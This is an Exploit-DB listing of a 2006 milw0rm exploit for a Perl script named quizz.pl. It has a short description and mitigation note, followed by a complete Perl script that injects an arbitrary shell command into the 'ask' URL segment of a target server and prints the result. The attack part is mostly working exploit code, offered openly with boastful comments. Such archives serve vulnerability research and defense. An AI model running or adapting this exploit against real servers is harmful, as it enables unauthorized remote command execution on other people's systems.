quizz.pl 0day Remote Command Execution Exploit

vendor:

N/A

by:

FOX_MULDER

9,3

CVSS

HIGH

Remote Command Execution

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

quizz.pl 0day Remote Command Execution Exploit

This exploit allows a remote attacker to execute arbitrary commands on a vulnerable server. The vulnerability exists in the 'quizz.pl' script, which is vulnerable to a command injection attack. The attacker can inject arbitrary commands into the 'ask' parameter of the script, which is then executed on the server.

Mitigation:

The vulnerability can be mitigated by removing the vulnerable script from the server or by patching the script.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#  quizz.p exploit by FOX_MULDER (fox_mulder@abv.bg)
#
#  Vulnerability foud by WBYTE.
#
#  Born to be root !!!
#  
#  !!!!!!!!!!!!!!!THANKS to WBYTE !!!!!!!!!!!!!!!!!
#
#  FACT:Wbyte doesn't sleeps , he waits !.
#  0day
####################################################################################

use IO::Socket;
use LWP::Simple; 

sub Usage {
print STDERR "\nFOX_MULDER DID IT AGAIN !!!\n";
print STDERR "Usage:\nquiz.pl <www.example.com> </path/> \"cmd\"\n";
exit;
}

if (@ARGV < 3)
{
 Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];
print "\n\n !!! PRIVATE PRIVATE PRIVATE !!! \n\n";
print "quizz.pl 0day Remote Command Execution Exploit by FOX_MULDER\n";

print "\n[+] Conecting to $host\n";
print "\n[+] Injecting command . . .\n\n";

my $result = get("http://$host$path/quizz.pl/ask/;$command|"); 

if (defined $result) { 
print "fox\@nasa# $result"; 
} 
else { 
print "Error with request.\n"; 
}

# milw0rm.com [2006-04-13]